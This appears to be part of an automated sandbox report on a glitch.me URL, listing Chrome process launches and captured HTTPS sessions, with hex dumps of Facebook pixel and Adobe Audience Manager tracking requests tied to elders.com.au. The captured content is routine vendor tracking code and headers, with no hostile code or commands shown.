                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    147192.168.2.449924157.240.253.14435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:26 UTC1199OUTGET /signals/config/1013340413305983?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1
                                                                                                                                    Host: connect.facebook.net
                                                                                                                                    Connection: keep-alive
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: */*
                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    2024-11-05 08:03:27 UTC1452INHTTP/1.1 200 OK
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Content-Type: application/x-javascript; charset=utf-8
                                                                                                                                    timing-allow-origin: *
                                                                                                                                    reporting-endpoints: coop_report="https://www.facebook.com/browser_reporting/coop/?minimize=0", coep_report="https://www.facebook.com/browser_reporting/coep/?minimize=0", permissions_policy="https://www.facebook.com/ajax/browser_error_reports/"
                                                                                                                                    report-to: {"max_age":2592000,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coop\/?minimize=0"}],"group":"coop_report","include_subdomains":true}, {"max_age":86400,"endpoints":[{"url":"https:\/\/www.facebook.com\/browser_reporting\/coep\/?minimize=0"}],"group":"coep_report"}, {"max_age":21600,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}],"group":"permissions_policy"}
                                                                                                                                    content-security-policy: default-src 'self' data: blob: *;script-src 'nonce-Ag7HnGcM' *.facebook.com *.fbcdn.net *.facebook.net 127.0.0.1:* blob: data: 'self' https://*.google-analytics.com *.google.com;style-src data: blob: 'unsafe-inline' *;connect-src *.facebook.com facebook.com *.fbcdn.net *.facebook.net wss://*.facebook.com:* wss://*.whatsapp.com:* wss://*.fbcdn.net attachment.fbsbx.com ws://localhost:* blob: *.cdninstagram.com 'self' https://*.google-analytics.com;img-src 'self' data: blob: * https://*.google-analytics.com;block-all-mixed-content;upgrade-insecure-requests;require-trusted-types-for 'script';
                                                                                                                                    document-policy: force-load-at-top
                                                                                                                                    2024-11-05 08:03:27 UTC1670INData Raw: 70 65 72 6d 69 73 73 69 6f 6e 73 2d 70 6f 6c 69 63 79 3a 20 61 63 63 65 6c 65 72 6f 6d 65 74 65 72 3d 28 29 2c 20 61 74 74 72 69 62 75 74 69 6f 6e 2d 72 65 70 6f 72 74 69 6e 67 3d 28 29 2c 20 61 75 74 6f 70 6c 61 79 3d 28 29 2c 20 62 6c 75 65 74 6f 6f 74 68 3d 28 29 2c 20 63 61 6d 65 72 61 3d 28 29 2c 20 63 68 2d 64 65 76 69 63 65 2d 6d 65 6d 6f 72 79 3d 28 29 2c 20 63 68 2d 64 6f 77 6e 6c 69 6e 6b 3d 28 29 2c 20 63 68 2d 64 70 72 3d 28 29 2c 20 63 68 2d 65 63 74 3d 28 29 2c 20 63 68 2d 72 74 74 3d 28 29 2c 20 63 68 2d 73 61 76 65 2d 64 61 74 61 3d 28 29 2c 20 63 68 2d 75 61 2d 61 72 63 68 3d 28 29 2c 20 63 68 2d 75 61 2d 62 69 74 6e 65 73 73 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72 74 2d 68 65 69 67 68 74 3d 28 29 2c 20 63 68 2d 76 69 65 77 70 6f 72
                                                                                                                                    Data Ascii: permissions-policy: accelerometer=(), attribution-reporting=(), autoplay=(), bluetooth=(), camera=(), ch-device-memory=(), ch-downlink=(), ch-dpr=(), ch-ect=(), ch-rtt=(), ch-save-data=(), ch-ua-arch=(), ch-ua-bitness=(), ch-viewport-height=(), ch-viewpor
                                                                                                                                    2024-11-05 08:03:27 UTC1INData Raw: 2f
                                                                                                                                    Data Ascii: /
                                                                                                                                    2024-11-05 08:03:27 UTC13818INData Raw: 2a 2a 0a 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 2d 70 72 65 73 65 6e 74 2c 20 46 61 63 65 62 6f 6f 6b 2c 20 49 6e 63 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 2a 0a 2a 20 59 6f 75 20 61 72 65 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 20 61 20 6e 6f 6e 2d 65 78 63 6c 75 73 69 76 65 2c 20 77 6f 72 6c 64 77 69 64 65 2c 20 72 6f 79 61 6c 74 79 2d 66 72 65 65 20 6c 69 63 65 6e 73 65 20 74 6f 20 75 73 65 2c 0a 2a 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 61 6e 64 20 64 69 73 74 72 69 62 75 74 65 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 69 6e 20 73 6f 75 72 63 65 20 63 6f 64 65 20 6f 72 20 62 69 6e 61 72 79 20 66 6f 72 6d 20 66 6f 72 20 75 73 65 0a 2a 20 69 6e 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 77 69 74
                                                                                                                                    Data Ascii: *** Copyright (c) 2017-present, Facebook, Inc. All rights reserved.** You are hereby granted a non-exclusive, worldwide, royalty-free license to use,* copy, modify, and distribute this software in source code or binary form for use* in connection wit
                                                                                                                                    2024-11-05 08:03:27 UTC16384INData Raw: 79 70 65 3a 22 40 40 70 72 6f 74 6f 74 79 70 65 22 29 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 61 7d 3b 66 75 6e 63 74 69 6f 6e 20 69 28 61 2c 62 29 7b 69 66 28 21 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 62 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 43 61 6e 6e 6f 74 20 63 61 6c 6c 20 61 20 63 6c 61 73 73 20 61 73 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 66 75 6e 63 74 69 6f 6e 20 6a 28 61 2c 62 29 7b 69 66 28 21 61 29 74 68 72 6f 77 20 6e 65 77 20 52 65 66 65 72 65 6e 63 65 45 72 72 6f 72 28 22 74 68 69 73 20 68 61 73 6e 27 74 20 62 65 65 6e 20 69 6e 69 74 69 61 6c 69 73 65 64 20 2d 20 73 75 70 65 72 28 29 20 68 61 73 6e 27 74 20 62 65 65 6e 20 63 61 6c 6c 65 64 22 29 3b 72 65 74 75 72 6e 20 62 26 26 28 74 79 70 65
                                                                                                                                    Data Ascii: ype:"@@prototype")?"symbol":typeof a};function i(a,b){if(!(a instanceof b))throw new TypeError("Cannot call a class as a function")}function j(a,b){if(!a)throw new ReferenceError("this hasn't been initialised - super() hasn't been called");return b&&(type
                                                                                                                                    2024-11-05 08:03:27 UTC16384INData Raw: 28 22 5b 66 62 70 69 78 65 6c 5d 20 22 2b 64 2e 69 64 2b 22 20 69 73 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 20 47 6f 20 74 6f 20 45 76 65 6e 74 73 20 4d 61 6e 61 67 65 72 20 74 6f 20 6c 65 61 72 6e 20 6d 6f 72 65 22 29 29 7d 29 7d 29 7d 29 28 29 3b 72 65 74 75 72 6e 20 65 2e 65 78 70 6f 72 74 73 7d 28 61 2c 62 2c 63 2c 64 29 7d 29 3b 65 2e 65 78 70 6f 72 74 73 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 70 72 6f 68 69 62 69 74 65 64 73 6f 75 72 63 65 73 22 29 3b 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 26 26 66 2e 72 65 67 69 73 74 65 72 50 6c 75 67 69 6e 28 22 66 62 65 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 70 72 6f 68 69 62 69 74 65 64 73 6f 75 72
                                                                                                                                    Data Ascii: ("[fbpixel] "+d.id+" is unavailable. Go to Events Manager to learn more"))})})})();return e.exports}(a,b,c,d)});e.exports=f.getFbeventsModules("SignalsFBEvents.plugins.prohibitedsources");f.registerPlugin&&f.registerPlugin("fbevents.plugins.prohibitedsour
                                                                                                                                    2024-11-05 08:03:27 UTC16384INData Raw: 5d 7d 2c 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 61 29 7b 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 28 62 29 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 62 5d 3d 61 29 7d 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70 6c 75 67 69 6e 73 2e 65 73 74 72 75 6c 65 65 6e 67 69 6e 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 67 2c 62 2c 63 2c 64 29 7b 76 61 72 20 65 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 65 2e 65 78 70 6f 72 74 73 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20
                                                                                                                                    Data Ascii: ]},f.ensureModuleRegistered=function(b,a){f.fbIsModuleLoaded(b)||(f.__fbeventsModules[b]=a)});f.ensureModuleRegistered("SignalsFBEvents.plugins.estruleengine",function(){return function(g,b,c,d){var e={exports:{}};e.exports;(function(){"use strict";var
                                                                                                                                    2024-11-05 08:03:27 UTC2565INData Raw: 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 50 6c 75 67 69 6e 22 29 3b 76 61 72 20 64 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 50 61 72 61 6d 4c 69 73 74 22 29 2c 67 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 4c 6f 67 67 69 6e 67 22 29 2c 68 3d 67 2e 6c 6f 67 45 72 72 6f 72 2c 69 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 45 76 65 6e 74 45 76 65 6e 74 22 29 2c 6a 3d 66 2e 67 65 74 46 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 28 22 73 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 53 65 6e 64 45 76 65 6e 74 22
                                                                                                                                    Data Ascii: FbeventsModules("SignalsFBEventsPlugin");var d=f.getFbeventsModules("SignalsParamList"),g=f.getFbeventsModules("SignalsFBEventsLogging"),h=g.logError,i=f.getFbeventsModules("SignalsFBEventsSendEventEvent"),j=f.getFbeventsModules("signalsFBEventsSendEvent"
                                                                                                                                    2024-11-05 08:03:27 UTC11948INData Raw: 4d 6f 64 75 6c 65 73 5b 61 5d 28 29 29 3b 72 65 74 75 72 6e 20 66 2e 5f 5f 66 62 65 76 65 6e 74 73 52 65 73 6f 6c 76 65 64 4d 6f 64 75 6c 65 73 5b 61 5d 7d 2c 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 21 21 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 61 5d 7d 2c 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 3d 66 75 6e 63 74 69 6f 6e 28 62 2c 61 29 7b 66 2e 66 62 49 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 28 62 29 7c 7c 28 66 2e 5f 5f 66 62 65 76 65 6e 74 73 4d 6f 64 75 6c 65 73 5b 62 5d 3d 61 29 7d 29 3b 0a 66 2e 65 6e 73 75 72 65 4d 6f 64 75 6c 65 52 65 67 69 73 74 65 72 65 64 28 22 53 69 67 6e 61 6c 73 46 42 45 76 65 6e 74 73 2e 70 6c 75 67 69
                                                                                                                                    Data Ascii: Modules[a]());return f.__fbeventsResolvedModules[a]},f.fbIsModuleLoaded=function(a){return!!f.__fbeventsModules[a]},f.ensureModuleRegistered=function(b,a){f.fbIsModuleLoaded(b)||(f.__fbeventsModules[b]=a)});f.ensureModuleRegistered("SignalsFBEvents.plugi


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    148192.168.2.449930157.240.253.354435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:26 UTC890OUTGET /tr/?id=1013340413305983&ev=PageView&dl=https%3A%2F%2Felders.com.au%2F&rl=https%3A%2F%2Fastonishing-maize-sunstone.glitch.me%2F&if=false&ts=1730793804756&sw=1280&sh=1024&v=2.9.176&r=stable&ec=0&o=4126&fbp=fb.2.1730793804748.70395038985089435&cs_est=true&ler=other&cdl=API_unavailable&it=1730793802669&coo=false&rqm=GET HTTP/1.1
                                                                                                                                    Host: www.facebook.com
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    2024-11-05 08:03:26 UTC465INHTTP/1.1 200 OK
                                                                                                                                    Content-Type: text/plain
                                                                                                                                    Access-Control-Allow-Origin:
                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                    cross-origin-resource-policy: cross-origin
                                                                                                                                    Server: proxygen-bolt
                                                                                                                                    X-FB-Connection-Quality: GOOD; q=0.7, rtt=118, rtx=0, c=10, mss=1380, tbw=3404, tp=-1, tpl=-1, uplat=0, ullat=0
                                                                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:26 GMT
                                                                                                                                    Connection: close
                                                                                                                                    Content-Length: 0


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    149192.168.2.44993334.250.133.1954435996C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-11-05 08:03:26 UTC756OUTGET /dest5.html?d_nsid=0 HTTP/1.1
                                                                                                                                    Host: eldersrural.demdex.net
                                                                                                                                    Connection: keep-alive
                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                    Sec-Fetch-Dest: iframe
                                                                                                                                    Referer: https://elders.com.au/
                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                    Cookie: demdex=50828223440744139920245021373270661928
                                                                                                                                    2024-11-05 08:03:26 UTC607INHTTP/1.1 200 OK
                                                                                                                                    Date: Tue, 05 Nov 2024 08:03:26 GMT
                                                                                                                                    Content-Type: text/html;charset=UTF-8
                                                                                                                                    Content-Length: 6983
                                                                                                                                    Connection: close
                                                                                                                                    X-TID: 9OwVAjDkQc4=
                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                    Cache-Control: no-cache,no-store,must-revalidate,max-age=0,proxy-revalidate,no-transform,private
                                                                                                                                    Pragma: no-cache
                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 UTC
                                                                                                                                    P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa PSAa PSDa OUR SAMa BUS PUR COM NAV INT"
                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                    last-modified: Wed, 16 Oct 2024 08:53:56 GMT
                                                                                                                                    DCS: dcs-prod-irl1-1-v067-03ed2ce5b.edge-irl1.demdex.com 0 ms
                                                                                                                                    2024-11-05 08:03:26 UTC6983INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 41 64 6f 62 65 20 41 75 64 69 65 6e 63 65 4d 61 6e 61 67 65 72 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73
                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><title>Adobe AudienceManager</title><script type="text/javas


                                                                                                                                    Click to jump to process

                                                                                                                                    Click to jump to process

                                                                                                                                    Click to jump to process

                                                                                                                                    Target ID:0
                                                                                                                                    Start time:03:02:06
                                                                                                                                    Start date:05/11/2024
                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:2
                                                                                                                                    Start time:03:02:10
                                                                                                                                    Start date:05/11/2024
                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2036 --field-trial-handle=1956,i,11158278246956056668,10871386056011559057,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:3
                                                                                                                                    Start time:03:02:14
                                                                                                                                    Start date:05/11/2024
                                                                                                                                    Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://astonishing-maize-sunstone.glitch.me/"
                                                                                                                                    Imagebase:0x7ff76e190000
                                                                                                                                    File size:3'242'272 bytes
                                                                                                                                    MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    No disassembly